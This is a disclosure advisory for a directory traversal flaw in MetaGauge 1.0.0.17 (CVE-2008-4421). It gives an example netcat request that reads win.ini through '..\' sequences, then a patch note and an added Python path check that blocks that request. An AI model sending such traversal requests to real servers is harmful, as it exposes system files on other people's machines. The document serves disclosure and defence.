
MetaGauge 1.0.0.17 Directory Traversal



Title: MetaGauge 1.0.0.17 Directory Traversal

-------------------------------------------------------------

Vendor: Hammer Software

Vendor URL: www.Hammer-Software.com

Vendor Response: Vendor has been notified and has since addressed the issue in the latest software release.

Description:

A directory traversal vulnerability exists in MetaGauge version 1.0.0.17 (and potentially earlier versions) that allows a remote user to view files local to the target server.

Example:

C:\> nc targethost 2004
GET /..\..\..\..\..\..\winnt\win.ini HTTP/1.1

Patch Information:

Hammer has addressed the issue in the latest version of MetaGauge:

http://dl.hammer-software.com/metagauge.zip

CVE:  CVE-2008-4421

Credit:

Brad Antoniewicz

brad.antoniewicz@foundstone.com
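
Added example (not part of the advisory and not Hammer Software's code): a server-side path check that refuses the request shown in the Example section by treating "\" as a path separator before testing for ".." segments. The document root and the function name are assumptions made for illustration.

```python
import posixpath
from urllib.parse import unquote

DOC_ROOT = "/srv/metagauge/www"  # assumed document root, not from the advisory


def resolve_request_path(target, doc_root=DOC_ROOT):
    """Map an HTTP request target to a path under doc_root.

    Returns the resolved path, or None when the target must be refused.
    """
    path = target.split("?", 1)[0]   # drop the query string
    path = unquote(path)             # decode once, before any check
    if "\x00" in path:
        return None
    # Windows accepts both separators, so treat "\" exactly like "/".
    path = path.replace("\\", "/")
    segments = [s for s in path.split("/") if s not in ("", ".")]
    for seg in segments:
        # ".." climbs out of the root; ":" covers drive letters such as c:
        if seg == ".." or ":" in seg:
            return None
    root = posixpath.normpath(doc_root)
    candidate = posixpath.normpath(posixpath.join(root, *segments))
    # Defence in depth: the normalised result must still sit under the root.
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


# Constructed sample targets; the first is the request line from the advisory.
SAMPLES = [
    "/..\\..\\..\\..\\..\\..\\winnt\\win.ini",
    "/index.html",
    "/reports/./daily.html?range=7d",
]

if __name__ == "__main__":
    for t in SAMPLES:
        print(f"{t!r:45} -> {resolve_request_path(t)}")
```

A check that only splits on "/" would pass the advisory's request unchanged, which is why the separator is normalised before the segment test.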
